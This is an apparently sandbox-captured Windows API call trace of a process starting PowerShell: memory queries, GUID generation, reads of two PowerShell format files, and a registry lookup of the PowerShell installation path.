	[0526.851] VirtualQuery (in: lpAddress=0x1eba70, lpBuffer=0x1ec930, dwLength=0x30 | out: lpBuffer=0x1ec930*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0526.852] VirtualQuery (in: lpAddress=0x1eba70, lpBuffer=0x1ec930, dwLength=0x30 | out: lpBuffer=0x1ec930*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0526.853] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9dc5d46b, Data2=0x7528, Data3=0x43ec, Data4=([0]=0x9f, [1]=0x7, [2]=0xa7, [3]=0xa2, [4]=0xed, [5]=0x3f, [6]=0xd1, [7]=0x1c))) returned 0x0
	[0526.856] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa3a3f0c2, Data2=0xc5ba, Data3=0x4602, Data4=([0]=0xad, [1]=0x1e, [2]=0x0, [3]=0x35, [4]=0x10, [5]=0x93, [6]=0x7a, [7]=0xd))) returned 0x0
	[0526.857] VirtualQuery (in: lpAddress=0x1ebcc0, lpBuffer=0x1ecb80, dwLength=0x30 | out: lpBuffer=0x1ecb80*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0526.858] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x25e98775, Data2=0x6378, Data3=0x4aba, Data4=([0]=0xba, [1]=0x3a, [2]=0xe9, [3]=0xc8, [4]=0x75, [5]=0x8, [6]=0x30, [7]=0xc5))) returned 0x0
	[0527.671] VirtualQuery (in: lpAddress=0x1ebcc0, lpBuffer=0x1ecb80, dwLength=0x30 | out: lpBuffer=0x1ecb80*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0527.672] VirtualQuery (in: lpAddress=0x1eb330, lpBuffer=0x1ec1f0, dwLength=0x30 | out: lpBuffer=0x1ec1f0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0527.696] VirtualQuery (in: lpAddress=0x1eb330, lpBuffer=0x1ec1f0, dwLength=0x30 | out: lpBuffer=0x1ec1f0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.697] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x5a44ff02, Data2=0xaacc, Data3=0x435f, Data4=([0]=0x82, [1]=0xb5, [2]=0xcb, [3]=0xfc, [4]=0x58, [5]=0xcb, [6]=0xde, [7]=0xc2))) returned 0x0
	[0527.698] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9162edf5, Data2=0x15e9, Data3=0x4e9d, Data4=([0]=0xa5, [1]=0x7d, [2]=0x47, [3]=0x66, [4]=0x5c, [5]=0x24, [6]=0xae, [7]=0x83))) returned 0x0
	[0527.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0527.699] SetErrorMode (uMode=0x1) returned 0x1
	[0527.699] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0527.699] GetFileType (hFile=0x2dc) returned 0x1
	[0527.699] SetErrorMode (uMode=0x1) returned 0x1
	[0527.699] GetFileType (hFile=0x2dc) returned 0x1
	[0527.699] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.700] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.700] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.700] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.700] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.700] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.701] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.701] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.702] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.702] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.702] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.702] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.702] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.703] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.703] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.703] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.705] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.705] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0xbce, lpOverlapped=0x0) returned 1
	[0527.705] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c38c6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c38c6*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0527.705] ReadFile (in: hFile=0x2dc, lpBuffer=0x32c4190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32c4190*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0527.705] CloseHandle (hObject=0x2dc) returned 1
	[0527.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0527.706] SetErrorMode (uMode=0x1) returned 0x1
	[0527.706] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0527.706] SetErrorMode (uMode=0x1) returned 0x1
	[0527.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0527.706] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x2dc) returned 0x0
	[0527.706] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0527.706] CoTaskMemAlloc (cb=0x5a) returned 0x3eaa40
	[0527.706] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x3eaa40, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0527.706] CoTaskMemFree (pv=0x3eaa40) 
	[0527.706] RegCloseKey (hKey=0x2dc) returned 0x0
	[0527.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0527.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0527.708] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8539d3ad, Data2=0x44af, Data3=0x44f9, Data4=([0]=0xa0, [1]=0x88, [2]=0xe7, [3]=0xe8, [4]=0x19, [5]=0x1, [6]=0x49, [7]=0x8c))) returned 0x0
	[0527.708] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x4561d3fa, Data2=0xc53f, Data3=0x4ddb, Data4=([0]=0x9c, [1]=0x64, [2]=0x16, [3]=0x9d, [4]=0x5c, [5]=0x99, [6]=0x20, [7]=0xb6))) returned 0x0
	[0527.708] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x619f7a81, Data2=0xfbd3, Data3=0x4eac, Data4=([0]=0x85, [1]=0xcf, [2]=0xf5, [3]=0xaa, [4]=0x3e, [5]=0x2c, [6]=0xe3, [7]=0x5a))) returned 0x0
	[0527.708] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc4a82c92, Data2=0x8efc, Data3=0x4696, Data4=([0]=0xa1, [1]=0xf2, [2]=0x15, [3]=0xd1, [4]=0x5, [5]=0x8, [6]=0x21, [7]=0xc7))) returned 0x0
	[0527.709] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x160135c6, Data2=0x767b, Data3=0x4c34, Data4=([0]=0xb5, [1]=0x6c, [2]=0x83, [3]=0x18, [4]=0xe1, [5]=0x94, [6]=0xf9, [7]=0x54))) returned 0x0
	[0527.709] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf3fb55f3, Data2=0x6281, Data3=0x49fb, Data4=([0]=0xa1, [1]=0x3c, [2]=0xd7, [3]=0x53, [4]=0x83, [5]=0xf7, [6]=0x54, [7]=0x9d))) returned 0x0
	[0527.709] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc6c18344, Data2=0xac4a, Data3=0x4014, Data4=([0]=0xad, [1]=0x7d, [2]=0x95, [3]=0xc3, [4]=0x39, [5]=0x74, [6]=0x25, [7]=0x91))) returned 0x0
	[0527.709] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x647a3d51, Data2=0x604f, Data3=0x41db, Data4=([0]=0xad, [1]=0xe1, [2]=0x53, [3]=0x3b, [4]=0x7e, [5]=0xf7, [6]=0x50, [7]=0x3))) returned 0x0
	[0527.709] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x26a8fc74, Data2=0xa35c, Data3=0x4be9, Data4=([0]=0x9b, [1]=0x19, [2]=0xb6, [3]=0xd, [4]=0x86, [5]=0xf2, [6]=0x62, [7]=0xde))) returned 0x0
	[0527.709] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1c3d134, Data2=0x9b5f, Data3=0x4f81, Data4=([0]=0xad, [1]=0x30, [2]=0x35, [3]=0xad, [4]=0x1c, [5]=0x71, [6]=0xe7, [7]=0x9a))) returned 0x0
	[0527.710] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x93f871c9, Data2=0x124e, Data3=0x46a8, Data4=([0]=0xb9, [1]=0x9a, [2]=0x2b, [3]=0xc4, [4]=0xd6, [5]=0x6a, [6]=0x9a, [7]=0x26))) returned 0x0
	[0527.710] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x63288e64, Data2=0x146a, Data3=0x45fe, Data4=([0]=0xba, [1]=0x14, [2]=0x42, [3]=0xfd, [4]=0xa0, [5]=0xa0, [6]=0x66, [7]=0x51))) returned 0x0
	[0527.710] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x543f903c, Data2=0x21f6, Data3=0x4154, Data4=([0]=0x9d, [1]=0x1b, [2]=0x72, [3]=0x2c, [4]=0x4, [5]=0x14, [6]=0x72, [7]=0x73))) returned 0x0
	[0527.710] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8f8a9d11, Data2=0x1b99, Data3=0x4bfb, Data4=([0]=0x9c, [1]=0x92, [2]=0xb7, [3]=0xaa, [4]=0xac, [5]=0x72, [6]=0x5c, [7]=0x77))) returned 0x0
	[0527.710] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xefbf1972, Data2=0x410e, Data3=0x4519, Data4=([0]=0x9c, [1]=0xe3, [2]=0xa2, [3]=0x73, [4]=0x31, [5]=0x27, [6]=0x51, [7]=0x20))) returned 0x0
	[0527.711] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x2b97350c, Data2=0x77fd, Data3=0x4a00, Data4=([0]=0x9b, [1]=0xf3, [2]=0xea, [3]=0x57, [4]=0xd5, [5]=0x1, [6]=0xfd, [7]=0xb3))) returned 0x0
	[0527.711] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe3e5e03f, Data2=0x6a24, Data3=0x4d6b, Data4=([0]=0x8d, [1]=0x6c, [2]=0x40, [3]=0x25, [4]=0x72, [5]=0xac, [6]=0xd0, [7]=0x75))) returned 0x0
	[0527.711] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1741ff82, Data2=0xa57e, Data3=0x4eaf, Data4=([0]=0x92, [1]=0x48, [2]=0x4b, [3]=0xfa, [4]=0x65, [5]=0xe7, [6]=0xe1, [7]=0x7))) returned 0x0
	[0527.711] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1a611d85, Data2=0x2104, Data3=0x460f, Data4=([0]=0xb3, [1]=0x81, [2]=0x39, [3]=0x39, [4]=0xc5, [5]=0x85, [6]=0x13, [7]=0x1f))) returned 0x0
	[0527.711] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa9e83ed9, Data2=0x4e6d, Data3=0x4bd8, Data4=([0]=0xa0, [1]=0x11, [2]=0x5e, [3]=0x4e, [4]=0x26, [5]=0x2d, [6]=0xd1, [7]=0x7c))) returned 0x0
	[0527.711] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x35aa5845, Data2=0xc3bc, Data3=0x410b, Data4=([0]=0x87, [1]=0xc0, [2]=0x2d, [3]=0xb0, [4]=0xd1, [5]=0x2b, [6]=0x83, [7]=0x74))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xade8ea39, Data2=0xb053, Data3=0x4533, Data4=([0]=0xb3, [1]=0xcd, [2]=0x3d, [3]=0x23, [4]=0xdd, [5]=0xba, [6]=0xac, [7]=0x7a))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd30c1e9b, Data2=0x517c, Data3=0x4dcf, Data4=([0]=0xa6, [1]=0x2b, [2]=0xc6, [3]=0xc0, [4]=0x26, [5]=0x56, [6]=0xd5, [7]=0x8a))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x12fa1188, Data2=0xed11, Data3=0x42be, Data4=([0]=0x8c, [1]=0x51, [2]=0x73, [3]=0x8, [4]=0x31, [5]=0xdd, [6]=0x9c, [7]=0x6))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa7cc62bc, Data2=0xed4c, Data3=0x44a1, Data4=([0]=0xb7, [1]=0x79, [2]=0x96, [3]=0xf9, [4]=0x51, [5]=0x84, [6]=0xe9, [7]=0x12))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x18541d28, Data2=0x6094, Data3=0x486d, Data4=([0]=0x96, [1]=0x55, [2]=0xa4, [3]=0x63, [4]=0xf1, [5]=0xf6, [6]=0x29, [7]=0x57))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3a1e300e, Data2=0x3433, Data3=0x4657, Data4=([0]=0xb5, [1]=0x8d, [2]=0xfe, [3]=0x1d, [4]=0xf2, [5]=0xc7, [6]=0x61, [7]=0xc5))) returned 0x0
	[0527.712] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x28441ec6, Data2=0x8425, Data3=0x4b04, Data4=([0]=0xa2, [1]=0x41, [2]=0x11, [3]=0xac, [4]=0x92, [5]=0xef, [6]=0x8b, [7]=0x37))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe36ba4c0, Data2=0xe51f, Data3=0x4fc7, Data4=([0]=0x8e, [1]=0xe0, [2]=0x69, [3]=0x6c, [4]=0x86, [5]=0x5d, [6]=0x1f, [7]=0xf5))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe566d17e, Data2=0xbe57, Data3=0x45ff, Data4=([0]=0x82, [1]=0x20, [2]=0x14, [3]=0x63, [4]=0x3, [5]=0x81, [6]=0x81, [7]=0x32))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc78921c4, Data2=0x60a6, Data3=0x4f26, Data4=([0]=0xb2, [1]=0x97, [2]=0xdf, [3]=0x91, [4]=0x55, [5]=0x18, [6]=0xa, [7]=0xc9))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa502fea9, Data2=0x3343, Data3=0x4241, Data4=([0]=0x99, [1]=0xd7, [2]=0xca, [3]=0x27, [4]=0xa9, [5]=0x62, [6]=0x4a, [7]=0x96))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x823ca33b, Data2=0x277f, Data3=0x437c, Data4=([0]=0x94, [1]=0xb8, [2]=0x9c, [3]=0xe2, [4]=0xd, [5]=0x31, [6]=0x7, [7]=0x29))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x93cfee37, Data2=0x9794, Data3=0x4b0f, Data4=([0]=0x93, [1]=0x77, [2]=0xa3, [3]=0xd5, [4]=0x16, [5]=0x8d, [6]=0x3d, [7]=0x21))) returned 0x0
	[0527.713] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf0c778e5, Data2=0x51bc, Data3=0x4a96, Data4=([0]=0x94, [1]=0xc4, [2]=0x49, [3]=0x17, [4]=0x3d, [5]=0xaa, [6]=0xc5, [7]=0x62))) returned 0x0
	[0527.714] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8c7f61d6, Data2=0x20a8, Data3=0x445b, Data4=([0]=0xb9, [1]=0x1a, [2]=0x14, [3]=0x2e, [4]=0xb3, [5]=0x3f, [6]=0xe5, [7]=0xf2))) returned 0x0
	[0527.714] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x98b8d76e, Data2=0x71af, Data3=0x4841, Data4=([0]=0xa5, [1]=0xd2, [2]=0xeb, [3]=0x5a, [4]=0x83, [5]=0x55, [6]=0x4c, [7]=0x2d))) returned 0x0
	[0527.715] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0527.715] GetFileType (hFile=0x2dc) returned 0x1
	[0527.715] SetErrorMode (uMode=0x1) returned 0x1
	[0527.715] GetFileType (hFile=0x2dc) returned 0x1
	[0527.715] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.715] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.715] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.715] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.716] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.716] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0527.716] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x119, lpOverlapped=0x0) returned 1
	[0527.716] ReadFile (in: hFile=0x2dc, lpBuffer=0x33d4980, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33d4980*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0527.716] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x2dc) returned 0x0
	[0527.716] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0527.716] CoTaskMemAlloc (cb=0x5a) returned 0x3eaa40
	[0527.716] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x3eaa40, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0527.716] CoTaskMemFree (pv=0x3eaa40) 
	[0527.717] RegCloseKey (hKey=0x2dc) returned 0x0
